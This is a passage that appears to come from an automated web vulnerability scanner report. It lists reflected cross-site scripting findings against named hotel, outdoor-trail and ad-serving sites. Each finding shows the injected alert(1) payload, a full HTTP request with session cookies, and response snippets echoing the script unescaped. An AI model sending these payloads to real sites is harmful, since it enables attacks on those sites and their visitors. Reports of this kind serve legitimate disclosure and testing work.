Set-Cookie: Phoenix_state_public=hotelCode%3A%0D%22%7CEndDate%3A10%2F01%2F2011%7Croom_qty%3A19eeec%22-alert%281%29-%22262ff3a3a492bcefc%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:48:39 GMT
Set-Cookie: Phoenix_state_room2=child2%3A%0D%7Cchild3%3A%0D%7Cchild1%3A%0D%7Cadult_qty%3A1%7Cchild4%3A%0D%7CREADME%3A1%7Cchild_qty%3A0; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:48:39 GMT
Set-Cookie: Phoenix_state_room1=child2%3A%0D%7Cchild3%3A%0D%7Cchild1%3A%0D%7Cadult_qty%3A1%7Cchild4%3A%0D%7CREADME%3A1%7Cchild_qty%3A0; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:48:39 GMT
Set-Cookie: Phoenix_state=sHHXaKbjkoBBu7_sOBBvBVmzCn6f-OUnTiqD0DUu9gmFxR43%0AW1nZ-uakZWDM71XQ2r83K0q3i9AqHCqRZv8Y8BP5NoDspSGZ%0AvdFvpLMRn1b0_9ZKgSdSYHZOE0M3-ZCqPEdQcBMpraWHRTv-%0ACC4-n0HH-OzKFRaqem6CaUbs6jyhPOkZICYm7Os9Cs1FyDtl%0AU8yh2n2WCkkgGaqKTbBlt5Nj1ZRHg1umSulXeQ5MMySCjvAN%0AgPqs7xEbPbD-HwHb8SJEo89R2KCfeMEMFFlmHSBy9BGADGio%0A; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:48:39 GMT
Set-Cookie: common=JbT7aW3jCuTWRLZ8hE4iAQ; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:48:39 GMT
Set-Cookie: Phoenix_state_room3=child2%3A%0D%7Cchild3%3A%0D%7Cchild1%3A%0D%7Cadult_qty%3A1%7Cchild4%3A%0D%7CREADME%3A1%7Cchild_qty%3A0; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:48:39 GMT
Content-Length: 54969
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


<!-- BEGIN: om/header.tt -->


<html>
<HEAD>
<title>Omni Hotels</title>

<!-- BEGIN: om/block.header_includes.tt -->
<meta http-equiv="Keywords" name="Keywords" content="">
<meta http-equiv="De
...[SNIP]...
ch page an identifying name, server, and channel on the next lines. */
s.pageName="RR"
s.server="l3phoenixprod1.omnihotels.com"
s.channel="Rates & Reservations - RR"
s.pageType=""
s.prop1=""
s.prop2="19eeec"-alert(1)-"262ff3a3a492bcefc"
s.prop3="0"
s.prop4="1 Nights"
s.prop5=""
s.prop6="NonMember"
/* E-commerce Variables */
s.eVar1=""
s.eVar2="19eeec"-alert(1)-"262ff3a3a492bcefc"
s.eVar3="0"
s.eVar4="1 Nights"
s.eVar5=""
s.eVa
...[SNIP]...

2.106. https://ssl.omnihotels.com/Omni [room_qty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ssl.omnihotels.com
Path:   /Omni

Issue detail

The value of the room_qty request parameter is copied into the HTML document as plain text between tags. The payload 7d582<script>alert(1)</script>3fc19fa98fe was submitted in the room_qty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Omni?region_city=CORPUS+CHRISTI&account_code=&iata_num=&invBlockCode=&room1_child2=&EndDate=10%2F01%2F2011&room3_child4=&room3_child_qty=0&room2_adult_qty=1&room3_child1=&room3_adult_qty=1&room3_child2=&room3_child3=&room2_child4=&room1_adult_qty=1&pagesrc=RR&room1_child3=&room2_child2=&room_number=1&StartDate=09%2F30%2F2011&room2_child_qty=0&rate_summary_type=package&room1_child1=&room2_child1=&pagedst=RR1_2&hotelCode=&room_qty=17d582<script>alert(1)</script>3fc19fa98fe&special_rates=1&room1_child_qty=0&splash=0&room1_child4=&room2_child3= HTTP/1.1
Host: ssl.omnihotels.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://ssl.omnihotels.com/Omni
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=imcomnihotelscom%3D%2526pid%253DRR%2526pidt%253D1%2526oid%253Djavascript%25253AsubmitForm%252528%252527navFormRR%252527%252529%25253B%2526ot%253DA; phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; Phoenix_state_public=EndDate%3A10%2F01%2F2011%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1; Phoenix_state_room2=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1; Phoenix_state_room1=adult_qty%3A1%7Cchild_qty%3A0%7CREADME%3A1; Phoenix_state=1mkhF0sCdFn2lRalDgvU22H5LAkbZtXWGORshrBGNFBsGF7Q%0ApH71_35RKY3JH4yi_nXgyreYesvZL1BhKEVNDCGJdY3sCf2I%0AYnJ518lstWvA1XBTMK4WfH3NSM5pv7D-9NChb5HRKja5KzIN%0AgmgWKIsqylamChUeMf7kW6iciVEbCKelt6RhzTjzyDGydPmJ%0AWNm1X7QkhTdiNenZVpvBrBTWc2FIQ7Pq; common=Y5JsAspErFJ6DDWEUyhCKg; Phoenix_state_room3=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:22:58 GMT
Server: Apache/2.2.14 (Linux/SUSE)
X-Catalyst: 5.80022
Set-Cookie: phoenix_session=9de73ca53c6da56b6925e633eebd24ff9d005ccf; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 14:22:59 GMT
Set-Cookie: Phoenix_state_public=hotelCode%3ACRPTWR%7CEndDate%3A10%2F01%2F2011%7Croom_qty%3A17d582%3Cscript%3Ealert%281%29%3C%2Fscript%3E3fc19fa98fe%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1b9b87f67bac04027054d9923; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:52:59 GMT
Set-Cookie: Phoenix_state_room2=adult_qty%3A1%7Cchild_qty%3A0%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:52:59 GMT
Set-Cookie: Phoenix_state_room1=child2%3A%0D%22%7Cchild3%3A%0D%22%7Cadult_qty%3A1%7Cchild1%3A%0D%22%7Cchild4%3A%0D%22%7Cchild_qty%3A0%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:52:59 GMT
Set-Cookie: Phoenix_state=IUVG0Ydom6abP6NEJCNuqB61qJgEWAAxcHSA0zoDJkb1jZCl%0ASvbp7KKYlz4W5Do_o5AvjMJwcc-wF9lZ6plV5IgSZdFj0iDr%0AHwjgQA81ffMOJK0C6rBpqVRanzc2FneszdXsRMEb-DDGQW5Y%0AJRdlqHCUJr9ypHDnS0x4Ma3ck0IlLvMDbgecAMNBOL8ttUXN%0AAVc4T8uvDW2l9UdIPgC_8xD82zJkUxh9c2vJ_xXgGtCN0AhQ%0A9qv2qPvajCTHEfFFYLF9VVE7Xv7LAe0Ns-afBQtm21xz1kfK%0AsOBxSig85OCG3YhKKdHQglZZApA1oCndELUfn9fcXbwd8KiG%0AtKuipa0KFDqaF9Za; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:52:59 GMT
Set-Cookie: common=Y5JsAspErFK2DiyIkSoBRw; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:52:59 GMT
Set-Cookie: Phoenix_state_room3=adult_qty%3A1%7Cchild_qty%3A0%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:52:59 GMT
Content-Length: 133886
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


<!-- BEGIN: om/header.tt -->


<html>
<HEAD>
<title>Omni Hotels</title>

<!-- BEGIN: om/block.header_includes.tt -->
<meta http-equiv="Keywords" name="Keywords" content="">
<meta http-equiv="De
...[SNIP]...
<td align=right>
17d582<script>alert(1)</script>3fc19fa98fe </td>
...[SNIP]...

2.107. https://ssl.omnihotels.com/Omni [room_qty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ssl.omnihotels.com
Path:   /Omni

Issue detail

The value of the room_qty request parameter is copied into the HTML document as plain text between tags. The payload 2a678<script>alert(1)</script>be9b3f09265c10983 was submitted in the room_qty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /Omni?region_city=CORPUS+CHRISTI&hotelCode=%0d&StartDate=09%2f30%2f2011&EndDate=10%2f01%2f2011&room_qty=12a678%3cscript%3ealert%281%29%3c%2fscript%3ebe9b3f09265c10983&room1_adult_qty=1&room1_child_qty=0&room1_child1=%0d&room1_child2=%0d&room1_child3=%0d&room1_child4=%0d&room2_adult_qty=1&room2_child_qty=0&room2_child1=%0d&room2_child2=%0d&room2_child3=%0d&room2_child4=%0d&room3_adult_qty=1&room3_child_qty=0&room3_child1=%0d&room3_child2=%0d&room3_child3=%0d&room3_child4=%0d&account_code=%0d&invBlockCode=%0d&special_rates=1&iata_num=%0d&pagedst=RR1_2&pagesrc=RR&room_number=1&rate_summary_type=package&splash=1 HTTP/1.1
Host: ssl.omnihotels.com
Connection: keep-alive
Cache-Control: max-age=0
Origin: https://ssl.omnihotels.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://ssl.omnihotels.com/Omni
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; Phoenix_state_public=EndDate%3A10%2F01%2F2011%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1; Phoenix_state_room2=adult_qty%3A%7CREADME%3A1%7Cchild_qty%3A; Phoenix_state_room1=adult_qty%3A1%7CREADME%3A1%7Cchild_qty%3A0; Phoenix_state=zJQuses7Aiwul4cqVwlRWomL3PuNtWJBNTu9MyupeO3X57LW%0Aoe5WtpDl_Vl4gx-B5YZLOFX0vGnhBT3TIbHGR9BKUx_T1F4p%0AY8Cd5EfgsEkGMjexuSRYud2iMDlWpU1gw3GGpWDOBEjBQyol%0AXdlwkCMGm5FsdMady_XLe_ZDTylFx3XEypp3y0BqbpqSc2ff%0A; common=yF0gdYdzar6nR8cTHWxkZg; Phoenix_state_room3=adult_qty%3A%7CREADME%3A1%7Cchild_qty%3A; s_cc=true; s_sq=imcomnihotelscom%3D%2526pid%253DRR%2526pidt%253D1%2526oid%253Djavascript%25253AsubmitForm%252528%252527navFormRR%252527%252529%25253B%2526ot%253DA

Response (redirected)

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:21:49 GMT
Server: Apache/2.2.14 (Linux/SUSE)
X-Catalyst: 5.80022
Set-Cookie: phoenix_session=9de73ca53c6da56b6925e633eebd24ff9d005ccf; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 14:21:50 GMT
Set-Cookie: Phoenix_state_public=EndDate%3A10%2F01%2F2011%7ChotelCode%3ACRPTWR%7Croom_qty%3A12a678%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebe9b3f09265c10983%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1b9b87f67bac04027054d9923; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:51:50 GMT
Set-Cookie: Phoenix_state_room2=child2%3A%0D%7Cchild3%3A%0D%7Cchild1%3A%0D%7Cadult_qty%3A1%7Cchild4%3A%0D%7CREADME%3A1%7Cchild_qty%3A0; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:51:50 GMT
Set-Cookie: Phoenix_state_room1=child2%3A%0D%7Cchild3%3A%0D%7Cadult_qty%3A1%7Cchild1%3A%0D%7Cchild4%3A%0D%7CREADME%3A1%7Cchild_qty%3A0; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:51:50 GMT
Set-Cookie: Phoenix_state=92kzurpl3SDW5NnD2Q0MmDg-oG7MdPng5icdQtAG4ouIt3YT%0AnqpaLnpV3u917F2rQRigCGY02Oyq04gVQfUjS-p79BjLPMrg%0A2a_Vl-57_NwSn6uOFvVYMehi3X4NtQldJN8RU7f7Cs-tNaXV%0AAvJ0Fqk4igNuGJFGJaW8DuSKVgWUr6GBvE38DWyhY5yYxis7%0Ak69tiQ5FfZq28O9wcnzXuwpBcWJ7eDWOYvGTBzsRKFM__5vN%0A7MfuZZ2urvyd7HhurF3q9ykY0pY4N0nzKImPS3Xh7z1E50MH%0AIAiEZGz60wMasHUF-x12fw; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:51:50 GMT
Set-Cookie: common=VCO3v6yb-kqpdoXeg_s_rQ; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:51:50 GMT
Set-Cookie: Phoenix_state_room3=child2%3A%0D%7Cchild3%3A%0D%7Cchild1%3A%0D%7Cadult_qty%3A1%7Cchild4%3A%0D%7Cchild_qty%3A0%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:51:50 GMT
Content-Length: 55015
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


<!-- BEGIN: om/header.tt -->


<html>
<HEAD>
<title>Omni Hotels</title>

<!-- BEGIN: om/block.header_includes.tt -->
<meta http-equiv="Keywords" name="Keywords" content="">
<meta http-equiv="De
...[SNIP]...
</script>be9b3f09265c10983"
s.prop3="0"
s.prop4="1 Nights"
s.prop5=""
s.prop6="NonMember"
/* E-commerce Variables */
s.eVar1=""
s.eVar2="12a678<script>alert(1)</script>be9b3f09265c10983"
s.eVar3="0"
s.eVar4="1 Nights"
s.eVar5=""
s.eVar6=""
s.events=""
s.state=""
s.zip=""
s.purchaseID=""
s.products=""
s.currencyCode=""
/************* DO NOT ALTER ANYTHING BELOW THIS LINE ! ********
...[SNIP]...

2.108. https://ssl.omnihotels.com/Omni [room_qty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ssl.omnihotels.com
Path:   /Omni

Issue detail

The value of the room_qty request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49c6e"%3balert(1)//c7571f12fe3 was submitted in the room_qty parameter. This input was echoed as 49c6e";alert(1)//c7571f12fe3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Omni?region_city=CORPUS+CHRISTI&account_code=&iata_num=&invBlockCode=&room1_child2=&EndDate=10%2F01%2F2011&room3_child4=&room3_child_qty=0&room2_adult_qty=1&room3_child1=&room3_adult_qty=1&room3_child2=&room3_child3=&room2_child4=&room1_adult_qty=1&pagesrc=RR&room1_child3=&room2_child2=&room_number=1&StartDate=09%2F30%2F2011&room2_child_qty=0&rate_summary_type=package&room1_child1=&room2_child1=&pagedst=RR1_2&hotelCode=&room_qty=149c6e"%3balert(1)//c7571f12fe3&special_rates=1&room1_child_qty=0&splash=0&room1_child4=&room2_child3= HTTP/1.1
Host: ssl.omnihotels.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://ssl.omnihotels.com/Omni
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=imcomnihotelscom%3D%2526pid%253DRR%2526pidt%253D1%2526oid%253Djavascript%25253AsubmitForm%252528%252527navFormRR%252527%252529%25253B%2526ot%253DA; phoenix_session=6ade5da4e9594a041cbfedcf41b4ca195abc665b; Phoenix_state_public=EndDate%3A10%2F01%2F2011%7Croom_qty%3A1%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1; Phoenix_state_room2=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1; Phoenix_state_room1=adult_qty%3A1%7Cchild_qty%3A0%7CREADME%3A1; Phoenix_state=1mkhF0sCdFn2lRalDgvU22H5LAkbZtXWGORshrBGNFBsGF7Q%0ApH71_35RKY3JH4yi_nXgyreYesvZL1BhKEVNDCGJdY3sCf2I%0AYnJ518lstWvA1XBTMK4WfH3NSM5pv7D-9NChb5HRKja5KzIN%0AgmgWKIsqylamChUeMf7kW6iciVEbCKelt6RhzTjzyDGydPmJ%0AWNm1X7QkhTdiNenZVpvBrBTWc2FIQ7Pq; common=Y5JsAspErFJ6DDWEUyhCKg; Phoenix_state_room3=adult_qty%3A%7Cchild_qty%3A%7CREADME%3A1

Response

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:22:53 GMT
Server: Apache/2.2.14 (Linux/SUSE)
X-Catalyst: 5.80022
Set-Cookie: phoenix_session=9de73ca53c6da56b6925e633eebd24ff9d005ccf; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 14:22:54 GMT
Set-Cookie: Phoenix_state_public=hotelCode%3ACRPTWR%7CEndDate%3A10%2F01%2F2011%7Croom_qty%3A149c6e%22%3Balert%281%29%2F%2Fc7571f12fe3%7CStartDate%3A09%2F30%2F2011%7CREADME%3A1b9b87f67bac04027054d9923; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:52:54 GMT
Set-Cookie: Phoenix_state_room2=adult_qty%3A1%7Cchild_qty%3A0%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:52:54 GMT
Set-Cookie: Phoenix_state_room1=child2%3A%0D%22%7Cchild3%3A%0D%22%7Cadult_qty%3A1%7Cchild1%3A%0D%22%7Cchild4%3A%0D%22%7Cchild_qty%3A0%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:52:54 GMT
Set-Cookie: Phoenix_state=wO9IajHUL68P_jF3AmxefEG7djraEjqJvCngv8zTsSNhmsIg%0AH84qlR2hX8A5yWR7FdArpGpf3BIuqmqh6NC_li3B3tVCj1Di%0AMVtGQhF2WwW6VxwJweVMO3jYX4BZyCqC10qlPTn7oCGT1DjC%0A5qpxhGj4m9yr-JQIQdfLIguztmasL_uLZ8QqlMtK-RWKNJ3v%0AxS8kWwSdpCfGgDVpLNzuDlGszVguxmWumofyt2waDJIovlTH%0Ajj-I0SIsMfl34BI_o4cXGjj6XN0HV2q55eZ3_D7EoB6U4y0x%0AsijzRMIoreCVSxd7CMWu46IpYb6JmAckSXlpY53qihY; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:52:54 GMT
Set-Cookie: common=8gs2L8xq5rh5yjx-HwDVkw; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:52:54 GMT
Set-Cookie: Phoenix_state_room3=adult_qty%3A1%7Cchild_qty%3A0%7CREADME%3A1; domain=.omnihotels.com; path=/; expires=Fri, 30-Sep-2011 13:52:54 GMT
Content-Length: 133847
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8


<!-- BEGIN: om/header.tt -->


<html>
<HEAD>
<title>Omni Hotels</title>

<!-- BEGIN: om/block.header_includes.tt -->
<meta http-equiv="Keywords" name="Keywords" content="">
<meta http-equiv="De
...[SNIP]...
dentifying name, server, and channel on the next lines. */
s.pageName="RR1_2"
s.server="l3phoenixprod1.omnihotels.com"
s.channel="Rates & Reservations - RR1_2"
s.pageType=""
s.prop1="CRPTWR"
s.prop2="149c6e";alert(1)//c7571f12fe3"
s.prop3="0"
s.prop4="1 Nights"
s.prop5=""
s.prop6="NonMember"
/* E-commerce Variables */
s.eVar1="CRPTWR"
s.eVar2="149c6e";alert(1)//c7571f12fe3"
s.eVar3="0"
s.eVar4="1 Nights"
s.eVar5=""
s.eVar6
...[SNIP]...

2.109. https://ssl.trails.com/subscribe.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ssl.trails.com
Path:   /subscribe.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5810f'-alert(1)-'e96cbe5de19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscribe.aspx?oc=4700&5810f'-alert(1)-'e96cbe5de19=1 HTTP/1.1
Host: ssl.trails.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trails.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1317388332560r0.20028289291076362; optimizelyBuckets=%7B%7D; uuid=A9478C5C-5B7F-45DE-A05C-8300718205AE; rsi_segs=; _bp=17603,17826; __utma=179317217.1626854796.1317388336.1317388336.1317388336.1; __utmb=179317217.1.10.1317388336; __utmc=179317217; __utmz=179317217.1317388336.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 13:16:17 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: WasPremiumUpsellClicked=; expires=Thu, 29-Sep-2011 13:16:17 GMT; path=/
Vary: Accept-Encoding
Content-Length: 49372


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
rls: {
                   cdn: '',
                   jscdn: '',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=https%3a%2f%2fwww.trails.com%2fsubscribe.aspx%3foc%3d4700%265810f'-alert(1)-'e96cbe5de19%3d1',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   n
...[SNIP]...

2.110. https://ssl.trails.com/subscribe.aspx [oc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://ssl.trails.com
Path:   /subscribe.aspx

Issue detail

The value of the oc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dcadf'-alert(1)-'0a12570fd26 was submitted in the oc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /subscribe.aspx?oc=4700dcadf'-alert(1)-'0a12570fd26 HTTP/1.1
Host: ssl.trails.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.trails.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1317388332560r0.20028289291076362; optimizelyBuckets=%7B%7D; uuid=A9478C5C-5B7F-45DE-A05C-8300718205AE; rsi_segs=; _bp=17603,17826; __utma=179317217.1626854796.1317388336.1317388336.1317388336.1; __utmb=179317217.1.10.1317388336; __utmc=179317217; __utmz=179317217.1317388336.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Fri, 30 Sep 2011 13:16:00 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: WasPremiumUpsellClicked=; expires=Thu, 29-Sep-2011 13:16:00 GMT; path=/
Vary: Accept-Encoding
Content-Length: 49358


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
       urls: {
                   cdn: '',
                   jscdn: '',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=https%3a%2f%2fwww.trails.com%2fsubscribe.aspx%3foc%3d4700dcadf'-alert(1)-'0a12570fd26',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   name:
...[SNIP]...

2.111. http:///AST354880053/direct/01/2448194 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://
Path:   /AST354880053/direct/01/2448194

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31f98"><script>alert(1)</script>2fa9bdd16a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /AST354880053/direct/01/2448194?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b92/3/0/%2a/c%3B246630211%3B0-0%3B0%3B51646058%3B4307-300/250%3B44251774/44269561/1%3Bu%3Dcat-_scat-_sscat-_art-_dmd-A9478C5C-5B7F-45DE-A05C-8300718205AE%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f&31f98"><script>alert(1)</script>2fa9bdd16a9=1 HTTP/1.1
Host:
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://ad.doubleclick.net/adi/dmd.trails/homepage;cat=;scat=;sscat=;ctype=other;art=0;kwd=;vid=0;ugc=0;state=;city=;zip=;sess=lo;sz=300x250;;u=cat-_scat-_sscat-_art-_dmd-A9478C5C-5B7F-45DE-A05C-8300718205AE;tile=3;ord=8332150?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=bb2&W=1; NAP=V=1.9&E=b58&C=FWWeOdQjav4-01BzsznEtT1CJyfe8xjK06kPzseNod3oP8GMWbUKsw&W=1; ach00=eb2a/1c72:ec40/2f33:233cf/1a43a; ach01=da2c1b5/1c72/e2f178b/eb2a/4e67d23e:da2c0cc/1c72/85c9f4b/eb2a/4e67d832:ca9bfb6/2f33/14f1ae7d/ec40/4e67d8e2:e1f70b5/1a43a/1403b670/233cf/4e73f21b; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Fri, 30 Sep 2011 13:13:44 GMT
Connection: close
Content-Length: 720

<body style=margin:0><a target=_blank href="http://clk..com/goiframe/238296558/354880053/direct/01" onclick="(new Image).src='http://ad.doubleclick.net/click%3Bh%3Dv8/3b92/3/0/%2a/c%3B246630211%3B0-0%3B0%3B51646058%3B4307-300/250%3B44251774/44269561/1%3Bu%3Dcat-_scat-_sscat-_art-_dmd-A9478C5C-5B7F-45DE-A05C-8300718205AE%3B%7Eaopt%3D2/0/36/0%3B%7Esscs%3D%3f&31f98"><script>alert(1)</script>2fa9bdd16a9=1http://t..com'">
...[SNIP]...

2.112. http:///MED336191486/direct/013055770899 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://
Path:   /MED336191486/direct/013055770899

Issue detail

